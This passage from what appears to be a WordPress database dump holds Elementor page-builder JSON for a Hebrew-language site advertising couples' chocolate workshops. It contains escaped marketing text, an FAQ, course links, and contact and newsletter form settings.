\\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5444492b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"25140dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5d4875e5\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"99e10b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"25d48f32\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f5c212c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3d05800e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"66aa1964\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2fc62575\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3a2fd4b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"199e02ce\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"540729a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ceee90e\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(662,146,'_elementor_version','0.4'),(663,146,'_elementor_template_type','post'),(667,147,'_wp_page_template','elementor_canvas'),(668,147,'_elementor_edit_mode','builder'),(669,147,'_elementor_template_type','post'),(670,147,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 